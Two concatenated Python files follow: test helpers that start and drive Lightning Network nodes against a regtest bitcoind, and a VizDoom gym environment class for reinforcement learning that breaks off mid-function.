self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generate(numblocks)
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd/lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': 'false',
'network': config.get('TEST_NETWORK', 'regtest'),
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(lightning_dir):
os.makedirs(lightning_dir)
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-broadcast-interval'] = 1000
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self)
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
        try:
            self.proc.wait(timeout)
        except subprocess.TimeoutExpired:
            return None
        return self.proc.returncode
class LightningNode(object):
def __init__(self, daemon, rpc, btc, executor, may_fail=False, may_reconnect=False):
self.rpc = rpc
self.daemon = daemon
self.bitcoin = btc
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query, use_copy=True):
orig = os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3")
if use_copy:
copy = os.path.join(self.daemon.lightning_dir, "lightningd-copy.sqlite3")
shutil.copyfile(orig, copy)
db = sqlite3.connect(copy)
else:
db = sqlite3.connect(orig)
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
rows = c.fetchall()
result = []
for row in rows:
result.append(dict(zip(row.keys(), row)))
db.commit()
c.close()
db.close()
return result
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def start(self):
self.daemon.start()
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if rc is None:
rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(rc))
else:
return rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
numfunds = len(self.rpc.listfunds()['outputs'])
self.bitcoin.generate_block(1)
wait_for(lambda: len(self.rpc.listfunds()['outputs']) > numfunds)
# Now go ahead and open a channel
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(l2.info['id'], amount)['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = "{}x1x{}".format(self.bitcoin.rpc.getblockcount(),
get_tx_p2wsh_outnum(self.bitcoin, tx, amount))
if wait_for_active:
# We wait until gossipd sees both local updates, as well as status NORMAL,
# so it can definitely route through.
self.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
l2.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
return scid
def subd_pid(self, subd):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
ex = re.compile(r'lightning_{}.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels()['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst.info['id'],
'delay': 5,
'channel': '1x1x1'
}
def wait_pay():
# Up to 10 seconds for payment to succeed.
start_time = time.time()
while dst.rpc.listinvoices(label)['invoices'][0]['status'] != 'paid':
if time.time() > start_time + 10:
raise TimeoutError('Payment timed out')
time.sleep(0.1)
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to comply
self.rpc.waitsendpay(rhash)
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[2] * 4
else:
raise ValueError()
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda: self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 3)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, testname, bitcoind, executor, directory):
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'may_reconnect',
'random_hsm',
'log_all_io',
'feerates',
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, disconnect=None, options=None, may_fail=False,
may_reconnect=False, random_hsm=False,
feerates=(15000, 7500, 3750), start=True, log_all_io=False,
dbfile=None, node_id=None):
if not node_id:
node_id = self.get_node_id()
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
socket_path = os.path.join(lightning_dir, "lightning-rpc").format(node_id)
daemon = LightningD(
lightning_dir, bitcoindproxy=self.bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
daemon.disconnect_file = os.path.join(lightning_dir, "dev_disconnect")
with open(daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
daemon.opts["dev-disconnect"] = "dev_disconnect"
if log_all_io:
assert DEVELOPER
daemon.env["LIGHTNINGD_DEV_LOG_IO"] = "1"
daemon.opts["log-level"] = "io"
if DEVELOPER:
daemon.opts["dev-fail-on-subdaemon-fail"] = None
daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if os.getenv("DEBUG_SUBD"):
daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if VALGRIND:
daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
if not may_reconnect:
daemon.opts["dev-no-reconnect"] = None
if options is not None:
daemon.opts.update(options)
rpc = LightningRpc(socket_path, self.executor)
node = LightningNode(daemon, rpc, self.bitcoind, self.executor, may_fail=may_fail,
may_reconnect=may_reconnect)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if VALGRIND:
node.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(node.daemon.lightning_dir)
]
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, 'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
node.start()
except Exception:
node.daemon.stop()
raise
return node
def line_graph(self, num_nodes, fundchannel=True, fundamount=10**6, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
nodes = self.get_nodes(num_nodes, opts=opts)
bitcoin = nodes[0].bitcoin
connections = [(nodes[i], nodes[i + 1]) for i in range(0, num_nodes - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log('openingd-{} chan #[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return nodes
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
src.bitcoin.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoin.generate_block(1)
for src, dst in connections:
wait_for(lambda: len(src.rpc.listfunds()['outputs']) > 0)
tx = src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)
wait_for(lambda: tx['txid'] in bitcoin.rpc.getrawmempool())
# Confirm all channels and wait for them to become usable
bitcoin.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
src.daemon.wait_for_log(r'Received channel_update for channel {scid}/. now ACTIVE'.format(scid=scid))
scids.append(scid)
if not wait_for_announce:
return nodes
bitcoin.generate_block(5)
def both_dirs_ready(n, scid):
resp = n.rpc.listchannels(scid)
return [a['active'] for a in resp['channels']] == [True, True]
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
wait_for(lambda: both_dirs_ready(nodes[0], scids[-1]))
wait_for(lambda: both_dirs_ready(nodes[-1], scids[0]))
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not VALGRIND:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
raise Exception("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail
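# ---------------------------------------------------------------------------
# Usage sketch (illustrative only): how a test typically drives the helpers
# above, assuming a pytest fixture supplies a ready NodeFactory as
# `node_factory` (the fixture itself is not defined in this file).
#
#     def test_simple_payment(node_factory):
#         # Two nodes joined by a funded, announced channel.
#         l1, l2 = node_factory.line_graph(2, fundamount=10**6, wait_for_announce=True)
#         l1.pay(l2, 100000)
#         assert only_one(l2.rpc.listinvoices()['invoices'])['status'] == 'paid'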
|
doom_gym.py
|
import copy
import os
import random
import re
import time
from os.path import join
from threading import Thread
import cv2
import gym
import numpy as np
from filelock import FileLock, Timeout
from gym.utils import seeding
from vizdoom.vizdoom import ScreenResolution, DoomGame, Mode, AutomapMode
from sample_factory.algorithms.utils.spaces.discretized import Discretized
from sample_factory.utils.utils import log, project_tmp_dir
def doom_lock_file(max_parallel):
"""
Doom instances tend to have problems starting when a lot of them are initialized in parallel.
This is not a problem during normal execution once the envs are initialized.
The "sweet spot" for the number of envs that can be initialized in parallel is about 5-10.
    Here we use a file-locking mechanism to ensure that only a limited number of envs are being initialized at the
    same time.
This tends to be more of a problem for multiplayer envs.
This also has an advantage of working across completely independent process groups, e.g. different experiments.
"""
lock_filename = f'doom_{random.randrange(0, max_parallel):03d}.lockfile'
tmp_dir = project_tmp_dir()
lock_path = join(tmp_dir, lock_filename)
return lock_path
def key_to_action_default(key):
"""
MOVE_FORWARD
MOVE_BACKWARD
MOVE_RIGHT
MOVE_LEFT
SELECT_WEAPON1
SELECT_WEAPON2
SELECT_WEAPON3
SELECT_WEAPON4
SELECT_WEAPON5
SELECT_WEAPON6
SELECT_WEAPON7
ATTACK
SPEED
TURN_LEFT_RIGHT_DELTA
"""
from pynput.keyboard import Key
# health gathering
action_table = {
Key.left: 0,
Key.right: 1,
Key.up: 2,
Key.down: 3,
}
# action_table = {
# Key.up: 0,
# Key.down: 1,
# Key.alt: 6,
# Key.ctrl: 11,
# Key.shift: 12,
# Key.space: 13,
# Key.right: 'turn_right',
# Key.left: 'turn_left',
# }
return action_table.get(key, None)
class VizdoomEnv(gym.Env):
def __init__(self,
action_space,
config_file,
coord_limits=None,
max_histogram_length=200,
show_automap=False,
skip_frames=1,
async_mode=False,
record_to=None):
self.initialized = False
# essential game data
self.game = None
self.state = None
self.curr_seed = 0
self.rng = None
self.skip_frames = skip_frames
self.async_mode = async_mode
# optional - for topdown view rendering and visitation heatmaps
self.show_automap = show_automap
self.coord_limits = coord_limits
# can be adjusted after the environment is created (but before any reset() call) via observation space wrapper
self.screen_w, self.screen_h, self.channels = 640, 480, 3
self.screen_resolution = ScreenResolution.RES_640X480
self.calc_observation_space()
self.black_screen = None
# provided as a part of environment definition, since these depend on the scenario and
# can be quite complex multi-discrete spaces
self.action_space = action_space
self.composite_action_space = hasattr(self.action_space, 'spaces')
self.delta_actions_scaling_factor = 7.5
scenarios_dir = join(os.path.dirname(__file__), 'scenarios')
self.config_path = join(scenarios_dir, config_file)
self.variable_indices = self._parse_variable_indices(self.config_path)
# only created if we call render() method
self.viewer = None
# record full episodes using VizDoom recording functionality
self.record_to = record_to
self.is_multiplayer = False # overridden in derived classes
# (optional) histogram to track positional coverage
# do not pass coord_limits if you don't need this, to avoid extra calculation
self.max_histogram_length = max_histogram_length
self.current_histogram, self.previous_histogram = None, None
if self.coord_limits:
x = (self.coord_limits[2] - self.coord_limits[0])
y = (self.coord_limits[3] - self.coord_limits[1])
if x > y:
len_x = self.max_histogram_length
len_y = int((y / x) * self.max_histogram_length)
else:
len_x = int((x / y) * self.max_histogram_length)
len_y = self.max_histogram_length
self.current_histogram = np.zeros((len_x, len_y), dtype=np.int32)
self.previous_histogram = np.zeros_like(self.current_histogram)
# helpers for human play with pynput keyboard input
self._terminate = False
self._current_actions = []
self._actions_flattened = None
self._prev_info = None
self._last_episode_info = None
self._num_episodes = 0
self.mode = 'algo'
self.seed()
def seed(self, seed=None):
self.curr_seed = seeding.hash_seed(seed, max_bytes=4)
self.rng, _ = seeding.np_random(seed=self.curr_seed)
return [self.curr_seed, self.rng]
def calc_observation_space(self):
self.observation_space = gym.spaces.Box(0, 255, (self.screen_h, self.screen_w, self.channels), dtype=np.uint8)
def _set_game_mode(self, mode):
if mode == 'replay':
self.game.set_mode(Mode.PLAYER)
else:
if self.async_mode:
log.info('Starting in async mode! Use this only for testing, otherwise PLAYER mode is much faster')
self.game.set_mode(Mode.ASYNC_PLAYER)
else:
self.game.set_mode(Mode.PLAYER)
def _create_doom_game(self, mode):
self.game = DoomGame()
self.game.load_config(self.config_path)
self.game.set_screen_resolution(self.screen_resolution)
self.game.set_seed(self.rng.randint(0, 2**32 - 1))
if mode == 'algo':
self.game.set_window_visible(False)
elif mode == 'human' or mode == 'replay':
self.game.add_game_args('+freelook 1')
self.game.set_window_visible(True)
else:
raise Exception('Unsupported mode')
self._set_game_mode(mode)
def _game_init(self, with_locking=True, max_parallel=10):
lock_file = lock = None
if with_locking:
lock_file = doom_lock_file(max_parallel)
lock = FileLock(lock_file)
init_attempt = 0
while True:
init_attempt += 1
try:
if with_locking:
with lock.acquire(timeout=20):
self.game.init()
else:
self.game.init()
break
except Timeout:
if with_locking:
log.debug(
'Another process currently holds the lock %s, attempt: %d', lock_file, init_attempt,
)
except Exception as exc:
log.warning('VizDoom game.init() threw an exception %r. Terminate process...', exc)
from sample_factory.envs.env_utils import EnvCriticalError
raise EnvCriticalError()
def initialize(self):
self._create_doom_game(self.mode)
# (optional) top-down view provided by the game engine
if self.show_automap:
self.game.set_automap_buffer_enabled(True)
self.game.set_automap_mode(AutomapMode.OBJECTS)
self.game.set_automap_rotate(False)
self.game.set_automap_render_textures(False)
# self.game.add_game_args("+am_restorecolors")
# self.game.add_game_args("+am_followplayer 1")
background_color = 'ffffff'
self.game.add_game_args('+viz_am_center 1')
self.game.add_game_args('+am_backcolor ' + background_color)
self.game.add_game_args('+am_tswallcolor dddddd')
# self.game.add_game_args("+am_showthingsprites 0")
self.game.add_game_args('+am_yourcolor ' + background_color)
self.game.add_game_args('+am_cheat 0')
self.game.add_game_args('+am_thingcolor 0000ff') # player color
self.game.add_game_args('+am_thingcolor_item 00ff00')
# self.game.add_game_args("+am_thingcolor_citem 00ff00")
self._game_init()
self.initialized = True
def _ensure_initialized(self):
if not self.initialized:
self.initialize()
@staticmethod
def _parse_variable_indices(config):
with open(config, 'r') as config_file:
lines = config_file.readlines()
lines = [l.strip() for l in lines]
variable_indices = {}
for line in lines:
if line.startswith('#'):
continue # comment
variables_syntax = r'available_game_variables[\s]*=[\s]*\{(.*)\}'
match = re.match(variables_syntax, line)
if match is not None:
variables_str = match.groups()[0]
variables_str = variables_str.strip()
variables = variables_str.split(' ')
for i, variable in enumerate(variables):
variable_indices[variable] = i
break
return variable_indices
def _black_screen(self):
if self.black_screen is None:
self.black_screen = np.zeros(self.observation_space.shape, dtype=np.uint8)
return self.black_screen
def _game_variables_dict(self, state):
game_variables = state.game_variables
variables = {}
for variable, idx in self.variable_indices.items():
variables[variable] = game_variables[idx]
return variables
def demo_path(self, episode_idx):
demo_name = f'e{episode_idx:03d}.lmp'
demo_path = join(self.record_to, demo_name)
demo_path = os.path.normpath(demo_path)
return demo_path
def reset(self):
self._ensure_initialized()
if self.record_to is not None and not self.is_multiplayer:
# does not work in multiplayer (uses different mechanism)
if not os.path.exists(self.record_to):
os.makedirs(self.record_to)
demo_path = self.demo_path(self._num_episodes)
log.warning('Recording episode demo to %s', demo_path)
self.game.new_episode(demo_path)
else:
if self._num_episodes > 0:
# no demo recording (default)
self.game.new_episode()
self.state = self.game.get_state()
img = None
try:
img = self.state.screen_buffer
except AttributeError:
# sometimes Doom does not return screen buffer at all??? Rare bug
pass
if img is None:
log.error('Game returned None screen buffer! This is not supposed to happen!')
img = self._black_screen()
# Swap current and previous histogram
if self.current_histogram is not None and self.previous_histogram is not None:
swap = self.current_histogram
self.current_histogram = self.previous_histogram
self.previous_histogram = swap
self.current_histogram.fill(0)
self._actions_flattened = None
self._last_episode_info = copy.deepcopy(self._prev_info)
self._prev_info = None
self._num_episodes += 1
return np.transpose(img, (1, 2, 0))
def _convert_actions(self, actions):
"""Convert actions from gym action space to the action space expected by Doom game."""
if self.composite_action_space:
# composite action space with multiple subspaces
spaces = self.action_space.spaces
else:
# simple action space, e.g. Discrete. We still treat it like composite of length 1
spaces = (self.action_space, )
actions = (actions, )
actions_flattened = []
for i, action in enumerate(actions):
if isinstance(spaces[i], Discretized):
# discretized continuous action
# check discretized first because it's a subclass of gym.spaces.Discrete
# the order of if clauses here matters! DON'T CHANGE THE ORDER OF IFS!
continuous_action = spaces[i].to_continuous(action)
actions_flattened.append(continuous_action)
elif isinstance(spaces[i], gym.spaces.Discrete):
# standard discrete action
num_non_idle_actions = spaces[i].n - 1
action_one_hot = np.zeros(num_non_idle_actions, dtype=np.uint8)
if action > 0:
action_one_hot[action - 1] = 1 # 0th action in each subspace is a no-op
actions_flattened.extend(action_one_hot)
elif isinstance(spaces[i], gym.spaces.Box):
# continuous action
actions_flattened.extend(list(action * self.delta_actions_scaling_factor))
else:
raise NotImplementedError(f'Action subspace type {type(spaces[i])} is not supported!')
return actions_flattened
def _vizdoom_variables_bug_workaround(self, info, done):
"""Some variables don't get reset to zero on game.new_episode(). This fixes it (also check overflow?)."""
if done and 'DAMAGECOUNT' in info:
log.info('DAMAGECOUNT value on done: %r', info.get('DAMAGECOUNT'))
if self._last_episode_info is not None:
bugged_vars = ['DEATHCOUNT', 'HITCOUNT', 'DAMAGECOUNT']
for v in bugged_vars:
if v in info:
info[v] -= self._last_episode_info.get(v, 0)
def _process_game_step(self, state, done, info):
if not done:
observation = np.transpose(state.screen_buffer, (1, 2, 0))
game_variables = self._game_variables_dict(state)
info.update(self.get_info(game_variables))
self._update_histogram(info)
self._prev_info = copy.deepcopy(info)
else:
observation = self._black_screen()
# when done=True Doom does not allow us to call get_info, so we provide info from the last frame
info.update(self._prev_info)
self._vizdoom_variables_bug_workaround(info, done)
return observation, done, info
def step(self, actions):
"""
Action is either a single value (discrete, one-hot), or a tuple with an action for each of the
discrete action subspaces.
"""
if self._actions_flattened is not None:
# provided externally, e.g. via human play
actions_flattened = self._actions_flattened
self._actions_flattened = None
else:
actions_flattened = self._convert_actions(actions)
default_info = {'num_frames': self.skip_frames}
reward = self.game.make_action(actions_flattened, self.skip_frames)
state = self.game.get_state()
done = self.game.is_episode_finished()
observation, done, info = self._process_game_step(state, done, default_info)
return observation, reward, done, info
def render(self, mode='human'):
try:
img = self.game.get_state().screen_buffer
img = np.transpose(img, [1, 2, 0])
if mode == 'rgb_array':
return img
h, w = img.shape[:2]
render_w = 1280
if w < render_w:
render_h = int(render_w * h / w)
img = cv2.resize(img, (render_w, render_h))
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer(maxwidth=render_w)
self.viewer.imshow(img)
return img
except AttributeError:
return None
def close(self):
try:
if self.game is not None:
self.game.close()
except RuntimeError as exc:
log.warning('Runtime error in VizDoom game close(): %r', exc)
if self.viewer is not None:
self.viewer.close()
def get_info(self, variables=None):
if variables is None:
variables = self._game_variables_dict(self.game.get_state())
info_dict = {'pos': self.get_positions(variables)}
info_dict.update(variables)
return info_dict
def get_info_all(self, variables=None):
if variables is None:
variables = self._game_variables_dict(self.game.get_state())
info = self.get_info(variables)
if self.previous_histogram is not None:
info['previous_histogram'] = self.previous_histogram
return info
def get_positions(self, variables):
return self._get_positions(variables)
@staticmethod
def _get_positions(variables):
have_coord_data = True
required_vars = ['POSITION_X', 'POSITION_Y', 'ANGLE']
for required_var in required_vars:
if required_var not in variables:
have_coord_data = False
break
x = y = a = np.nan
if have_coord_data:
x = variables['POSITION_X']
y = variables['POSITION_Y']
a = variables['ANGLE']
return {'agent_x': x, 'agent_y': y, 'agent_a': a}
def get_automap_buffer(self):
if self.game.is_episode_finished():
return None
state = self.game.get_state()
map_ = state.automap_buffer
map_ = np.swapaxes(map_, 0, 2)
map_ = np.swapaxes(map_, 0, 1)
return map_
def _update_histogram(self, info, eps=1e-8):
if self.current_histogram is None:
return
agent_x, agent_y = info['pos']['agent_x'], info['pos']['agent_y']
# Get agent coordinates normalized to [0, 1]
dx = (agent_x - self.coord_limits[0]) / (self.coord_limits[2] - self.coord_limits[0])
dy = (agent_y - self.coord_limits[1]) / (self.coord_limits[3] - self.coord_limits[1])
# Rescale coordinates to histogram dimensions
# Subtract eps to exclude upper bound of dx, dy
dx = int((dx - eps) * self.current_histogram.shape[0])
dy = int((dy - eps) * self.current_histogram.shape[1])
self.current_histogram[dx, dy] += 1
def _key_to_action(self, key):
if hasattr(self.action_space, 'key_to_action'):
return self.action_space.key_to_action(key)
else:
return key_to_action_default(key)
def _keyboard_on_press(self, key):
from pynput.keyboard import Key
if key == Key.esc:
self._terminate = True
return False
action = self._key_to_action(key)
if action is not None:
